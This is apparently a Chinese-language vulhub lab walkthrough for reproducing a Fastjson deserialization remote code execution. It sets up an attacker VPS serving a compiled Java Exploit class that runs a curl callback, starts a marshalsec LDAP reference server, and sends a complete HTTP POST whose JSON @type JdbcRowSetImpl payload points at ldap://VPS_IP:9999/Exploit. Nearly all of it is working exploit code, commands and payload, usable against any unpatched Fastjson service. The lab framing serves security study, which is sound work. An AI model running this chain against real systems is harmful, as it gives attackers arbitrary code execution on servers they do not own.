**
一、启动vulhub靶机
**
docker-compose up -d
二、公网VPS主机操作
1、JDK环境(有版本要求,尽量低于1.8.0_191版本,测试在1.8.0_181可成功)
java -version
JDK1.8.0_181下载链接
JDK安装
2、java的PoC,保存为Exploit.java文件
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec("curl http://VPS主机/Hacker");
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
3、编译Exploit.java文件为Exploit.class,并且在当前目录下运行Web服务
javac Exploit.java
python3 -m http.server
4、下载marshalsec-0.0.3-SNAPSHOT-all.jar文件,并与Exploit.java同一目录下,在当前目录下运行LDAP服务,修改IP为当前这台vps服务器的IP。
marshalsec-0.0.3-SNAPSHOT-all.jar下载链接
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://VPS_IP:8000/#Exploit" 9999
注意:marshalsec-0.0.3-SNAPSHOT-all.jar文件、Exploit.java、Exploit.class需在同目录下。启动服务命令也在当前目录下运行
5、发送payload前,查看apache服务日志,检验命令curl http://VPS主机/Hacker是否执行。
tail -f /var/log/apache2/access.log
三、发送payload
POST / HTTP/1.1
Host: 192.168.150.143:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 266
{
"name":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"x":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://VPS_IP:9999/Exploit",
"autoCommit":true
}
}